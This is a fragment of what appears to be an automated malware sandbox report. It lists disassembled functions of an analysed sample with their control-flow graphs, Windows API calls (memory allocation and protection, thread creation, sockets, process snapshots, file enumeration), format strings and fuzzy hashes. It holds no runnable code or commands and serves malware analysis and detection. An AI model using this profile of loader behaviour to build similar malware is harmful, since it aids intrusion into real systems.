                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                        • String ID:
                        • API String ID: 548016584-0
                        • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                        • Instruction ID: 32ef06cb1b9e28b3f11a31af710c90a349932bed3ebf3dc789975426a31bf481
                        • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                        • Instruction Fuzzy Hash: 16A103203003C942DB58FBB2E9917BE6792EB85780F544039AF1A47796DF38CA06E702
                        Function 00CEF014 Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 415 cef014-cef04f call cef118 WSASocketA 418 cef058-cef097 WSAIoctl 415->418 419 cef051-cef053 415->419 421 cef099-cef0b0 418->421 422 cef0b4-cef0be 418->422 420 cef0f6-cef10a 419->420 421->422 423 cef0eb-cef0ee call d125e8 422->423 424 cef0c0 422->424 429 cef0f4 423->429 425 cef0c5-cef0cf 424->425 427 cef0d6-cef0e2 425->427 428 cef0d1-cef0d4 425->428 427->423 431 cef0e4 427->431 428->427 430 cef0e6 428->430 429->420 430->423 431->425
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: IoctlSocketStartupclosesocket
                        • String ID:
                        • API String ID: 365704328-0
                        • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                        • Instruction ID: ef607c9626c4928d7e227c17ce5c4f253cc2f852fff70c61667afc78a032f798
                        • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                        • Instruction Fuzzy Hash: C92181726047C482DB208F25B58075AB7A5F3887E4F548639EEAD43B89DF39C6568B00
                        Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47memorythreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 432 401595-4015c5 VirtualAlloc 433 4015c7-4015c9 432->433 434 4015e0-40162c call 401563 VirtualProtect CreateThread 433->434 435 4015cb-4015de 433->435 435->433
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: Virtual$AllocCreateProtectThread
                        • String ID:
                        • API String ID: 3039780055-0
                        • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                        • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                        • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                        • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308
                        Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 438 401704-40175c CreateFileA 439 40179c-4017a5 438->439 440 40175e-401760 438->440 441 401781-40178f CloseHandle 440->441 442 401762-40177f ReadFile 440->442 441->439 442->441 443 401791-40179a 442->443 443->440
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleRead
                        • String ID:
                        • API String ID: 1035965006-0
                        • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                        • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                        • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                        • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08
                        Function 00CEF118 Relevance: 3.0, APIs: 2, Instructions: 42networkCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 444 cef118-cef12a 445 cef14e-cef150 444->445 446 cef12c-cef136 call d125e0 444->446 448 cef1c9-cef1d1 445->448 449 cef152-cef159 445->449 450 cef13c-cef13e 446->450 449->448 451 cef15b-cef1c2 call cfb434 * 2 call cfb454 * 4 449->451 452 cef144 450->452 453 cef1d2-cef1e3 WSACleanup call d00414 450->453 451->448 452->445
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CleanupStartup
                        • String ID:
                        • API String ID: 915672949-0
                        • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                        • Instruction ID: 9b17500ee73f032c61694a9f4aab55fba91f8f500355b41fbb905a12261b217e
                        • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                        • Instruction Fuzzy Hash: 55114430601B8986FB18ABE0F9693746695A740304F40003E97590B3D7DF7E8A56D735
                        Function 00A496B4 Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 468 a496b4-a4971e 469 a49723-a4972c 468->469 470 a49732-a497b6 call a48b64 LoadLibraryA 469->470 471 a4994f-a49963 469->471 474 a497bb-a497c4 470->474 475 a4993c-a4994a 474->475 476 a497ca-a497d0 474->476 475->469 477 a497d6-a497ee 476->477 478 a498a9-a49910 call a48b64 476->478 477->478 479 a497f4-a498a7 477->479 481 a49913-a49927 478->481 479->481 483 a49937 481->483 484 a49929-a49932 481->484 483->474 484->483
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                        • Instruction ID: 069f0ed1dbcdf0ef3c1a2f06b0b77dde42cb96f024babd2cbf270b92fc670b3c
                        • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                        • Instruction Fuzzy Hash: 0B619836219B8486CAA0CB0AE49035AB7A4F7C9B94F548125EFCE83B29DF3DD555CB00
                        Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 486 403040-403051 call 401950 call 4017f8 491 403058-40305f SleepEx 486->491 491->491
                        APIs
                          • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                          • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                          • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                          • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                        • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: Sleep$CountCreateThreadTickmalloc
                        • String ID:
                        • API String ID: 345437100-0
                        • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                        • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                        • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                        • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E
                        Function 00A49324 Relevance: 1.3, APIs: 1, Instructions: 87memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 492 a49324-a49358 493 a4944d-a49453 492->493 494 a4935e-a49374 492->494 495 a49455-a49474 VirtualAlloc 493->495 496 a49479-a49482 493->496 494->493 498 a4937a-a493c2 494->498 495->496 500 a493ce-a493d4 498->500 501 a493d6-a493de 500->501 502 a49402-a49408 500->502 501->502 503 a493e0-a493e6 501->503 502->493 504 a4940a-a49445 502->504 503->502 505 a493e8-a49400 503->505 504->493 505->500
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                        • Instruction ID: 47bc8141f208b9515026f83a704171a8565f153e07a9c82aeb2017886ed88dfb
                        • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                        • Instruction Fuzzy Hash: D8419776628B8487DB60CB1AE48471BB7A1F7C8B94F105225FADE87B68DB3CD4518F00

                        Non-executed Functions

                        Function 00D06514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_invalid_parameter_noinfo
                        • String ID: U
                        • API String ID: 3902385426-4171548499
                        • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                        • Instruction ID: c7f84e9296c20871b6d8fd9faf511ad11992e5952b8757a454d5c750279a91e5
                        • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                        • Instruction Fuzzy Hash: EF02147221468186DB20CF69E4843AEB7A1F795B48F584116EB8E83BD8DF3DC855CB30
                        Function 00CF867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 00CF8FA0
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF8FD9
                        • Process32First.KERNEL32 ref: 00CF8FFB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                        • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                        • API String ID: 718051232-1833344708
                        • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                        • Instruction ID: b05046fd8401157012b257763ae1a937d9d76a6efde37ad6d47f462ff90443ff
                        • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                        • Instruction Fuzzy Hash: 3D723921B0474886DBE8DB2798507791291F789BC0FA44126EF1F83759EE38CB8AD743
                        Function 00D02F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D02FFD
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D03002
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _fileno.LIBCMT ref: 00D0302F
                          • Part of subcall function 00D05A54: _errno.LIBCMT ref: 00D05A5D
                          • Part of subcall function 00D05A54: _invalid_parameter_noinfo.LIBCMT ref: 00D05A68
                        • write_multi_char.LIBCMT ref: 00D0366B
                        • write_string.LIBCMT ref: 00D03688
                        • write_multi_char.LIBCMT ref: 00D036A5
                        • write_string.LIBCMT ref: 00D03704
                        • write_string.LIBCMT ref: 00D0373B
                        • write_multi_char.LIBCMT ref: 00D0375D
                        • free.LIBCMT ref: 00D03771
                        • _isleadbyte_l.LIBCMT ref: 00D03842
                        • write_char.LIBCMT ref: 00D03858
                        • write_char.LIBCMT ref: 00D03879
                        • _errno.LIBCMT ref: 00D0397C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D03987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                        • String ID: $@
                        • API String ID: 3318157856-1077428164
                        • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                        • Instruction ID: 90a5206e0a0396b7a789dfe531f3ef538299a81198a0ee4e7bedf08dcfe30204
                        • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                        • Instruction Fuzzy Hash: 5F4227B260868486EB25CF19D54437E7BB8F785794F581106DE8E07BE4DB79CB40CB20
                        Function 00D02528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D02589
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D0258E
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _fileno.LIBCMT ref: 00D025BB
                          • Part of subcall function 00D05A54: _errno.LIBCMT ref: 00D05A5D
                          • Part of subcall function 00D05A54: _invalid_parameter_noinfo.LIBCMT ref: 00D05A68
                        • write_multi_char.LIBCMT ref: 00D02BEB
                        • write_string.LIBCMT ref: 00D02C08
                        • write_multi_char.LIBCMT ref: 00D02C25
                        • write_string.LIBCMT ref: 00D02C84
                        • write_string.LIBCMT ref: 00D02CBB
                        • write_multi_char.LIBCMT ref: 00D02CDD
                        • free.LIBCMT ref: 00D02CF1
                        • _isleadbyte_l.LIBCMT ref: 00D02DC2
                        • write_char.LIBCMT ref: 00D02DD8
                        • write_char.LIBCMT ref: 00D02DF9
                        • _errno.LIBCMT ref: 00D02EF3
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D02EFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                        • String ID:
                        • API String ID: 3318157856-3916222277
                        • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                        • Instruction ID: bfca2a65bede5cca191ee72feb83b7b3ada21d29e692b32de81d5df08f9560f1
                        • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                        • Instruction Fuzzy Hash: 6732463260A69486EB29CF15D58C3BE7BB4F745794F281006DE8E17AE8DB78C940CB70
                        Function 00A5239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A523FD
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A52402
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _fileno.LIBCMT ref: 00A5242F
                          • Part of subcall function 00A54E54: _errno.LIBCMT ref: 00A54E5D
                          • Part of subcall function 00A54E54: _invalid_parameter_noinfo.LIBCMT ref: 00A54E68
                        • write_multi_char.LIBCMT ref: 00A52A6B
                        • write_string.LIBCMT ref: 00A52A88
                        • write_multi_char.LIBCMT ref: 00A52AA5
                        • write_string.LIBCMT ref: 00A52B04
                        • write_string.LIBCMT ref: 00A52B3B
                        • write_multi_char.LIBCMT ref: 00A52B5D
                        • free.LIBCMT ref: 00A52B71
                        • _isleadbyte_l.LIBCMT ref: 00A52C42
                        • write_char.LIBCMT ref: 00A52C58
                        • write_char.LIBCMT ref: 00A52C79
                        • _errno.LIBCMT ref: 00A52D7C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A52D87
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                        • String ID: $@
                        • API String ID: 3318157856-1077428164
                        • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                        • Instruction ID: 12e9f70891ca004c3d53ea6b50c067b8f3660ae22ecfabf3e72a788cb115e911
                        • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                        • Instruction Fuzzy Hash: B142257370868486EB29CF69D5443BE7BB0F787796F281015DF4A57AA8DB38C948CB01
                        Function 00A51928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A51989
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A5198E
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _fileno.LIBCMT ref: 00A519BB
                          • Part of subcall function 00A54E54: _errno.LIBCMT ref: 00A54E5D
                          • Part of subcall function 00A54E54: _invalid_parameter_noinfo.LIBCMT ref: 00A54E68
                        • write_multi_char.LIBCMT ref: 00A51FEB
                        • write_string.LIBCMT ref: 00A52008
                        • _errno.LIBCMT ref: 00A522F3
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A522FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                        • String ID: -$0
                        • API String ID: 3246410048-417717675
                        • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                        • Instruction ID: 1bc2377888ae09ea78862b305734addde8407ae7f9ccdd2dd88c1e36aa400a8b
                        • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                        • Instruction Fuzzy Hash: 55324573708A8486EB29CF19D5443BE7BB0F746B86F245116DF4A47AA8DB39C94CCB00
                        Function 00A55914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_invalid_parameter_noinfo
                        • String ID: U
                        • API String ID: 3902385426-4171548499
                        • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                        • Instruction ID: f2896f628be13ac30ef92d4e9eeeaee73062e311eec2a66dfa7590927d6340cd
                        • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                        • Instruction Fuzzy Hash: 48021E32B14B8186DB208F39E49436ABBB1F785B9AF544116EF8A83B54DB3DC54DCB10
                        Function 00CF7B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _snprintf.LIBCMT ref: 00CF7D66
                        • _snprintf.LIBCMT ref: 00CF7D83
                        • _snprintf.LIBCMT ref: 00CF7CA5
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • _snprintf.LIBCMT ref: 00CF7FD8
                        • _snprintf.LIBCMT ref: 00CF8334
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$_errno_invalid_parameter_noinfo
                        • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                        • API String ID: 3442832105-1222817042
                        • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                        • Instruction ID: 86ee277ffcf12d965975090fdd930f6e4eb6eda1509887c8b1ac8b2692ee8fe0
                        • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                        • Instruction Fuzzy Hash: A432D962614E8992DB558F6DE0012F9B3B0FF98799F446201EF8917B21EF38D2A7D341
                        Function 00CF1C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CF1C63
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CED044: malloc.LIBCMT ref: 00CED057
                          • Part of subcall function 00CED074: htonl.WS2_32 ref: 00CED07F
                        • GetCurrentDirectoryA.KERNEL32 ref: 00CF1CDB
                        • FindFirstFileA.KERNEL32 ref: 00CF1D14
                        • GetLastError.KERNEL32 ref: 00CF1D23
                        • free.LIBCMT ref: 00CF1D5E
                        • free.LIBCMT ref: 00CF1D6B
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • FileTimeToSystemTime.KERNEL32 ref: 00CF1D78
                        • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00CF1D89
                        • FindNextFileA.KERNEL32 ref: 00CF1E46
                        • FindClose.KERNEL32 ref: 00CF1E57
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                        • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                        • API String ID: 723279517-1754256099
                        • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                        • Instruction ID: a37466983b5ee7b1545be0c832df491ebdfc4534bf068a047da5a2561ca4c890
                        • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                        • Instruction Fuzzy Hash: 0F51C47230479596DB50DF62E8407AEB7A1F789B90F404016EF4A47B98EF7DC60ADB40
                        Function 00A46F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _snprintf.LIBCMT ref: 00A47166
                        • _snprintf.LIBCMT ref: 00A47183
                        • _snprintf.LIBCMT ref: 00A470A5
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • _snprintf.LIBCMT ref: 00A473D8
